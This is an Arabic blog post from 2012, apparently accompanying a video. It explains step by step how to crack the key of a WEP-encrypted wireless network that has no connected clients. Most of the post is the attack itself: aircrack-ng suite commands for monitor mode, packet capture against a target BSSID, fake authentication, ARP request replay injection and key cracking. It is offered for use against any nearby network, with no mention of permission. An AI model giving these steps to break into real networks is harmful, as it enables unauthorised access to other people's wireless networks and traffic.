السبت، 29 ديسمبر 2012

فيديو: WEP fake authentication attack


اليوم ان شاء الله سأشرح الـ fake authentication attack لاظهار الـ Key الخاص بشبكة وايرلس تستخدم تشفير WEP, طبعا اهم شيئ هو جمع اكبر كمية ممكنة من الحزم packets ويتم ذلك باستخدام عدة برامج من اشهرها aircrack-ng. ولكن ليستطيع البرنامج ان يجمع الحزم يجب ان يكون هناك جهاز اخر غيرك متصل بالشبكة و يستعمل الانترنت وفي كثير من الحالات نجد شبكة و لكن لا يوجد اي شخص متصل بها (كلاينت) و في هده الحالة هناك عدة اساليب بامكاننا استخدامها و اليوم ان شاء الله سأشرح اكثرها شهرة و هو الـ fake authentication attack.
الشرح باستخدام توزيعة BackTrack و يمكن تطبيقه على أي توزيعة لينكس أخرى...




خطوات العمل

1- وضع كرت الوايرلس في الـ moniter mode باستخدام الأمر:
airmon-ng start [interface]
interface = اسم كرت الوايرلس الخاص بك

2- تشغيل aircrack-ng لجمع الحزم باستخدام الأمر:
airodump-ng --bssid [target network BSSID] -c [channel] -w [aoutput] [interface]

3- تشغيل aireplay لعمل fake auth attack باستخدام الأمر:
aireplay-ng -1 [reassocciation time] -e [target network ESSID] -a [target BSSID] -h [your MAC address] [interface]

4- تشغيل aireplay-ng لعمل arp request replay attack باستخدام الأمر:
aireplay-ng -3 -e [target ESSID] -b [Target BSSID] -h [our mac address] -x [number of paclets per second] [interface]

5- فك تشفير الحزم باستخدام aircrack-ng باستخدام الأمر:
aircrack-ng output.cab

و اي استفسار أنا حاضر
هناك عدة طرق لمعرفة تشفير الشبكة بامكانك معرفته باستخدام برنامج airodump-ng من خلال الامر 
 airmon-ng wlan0
بعد دالك 
airodump-ng mon0
و ستضهر لك جميع الشبكات المتوفرة و معلوماتها.ستجد نوع التشفير تحت حقل ENC

ليست هناك تعليقات:

إرسال تعليق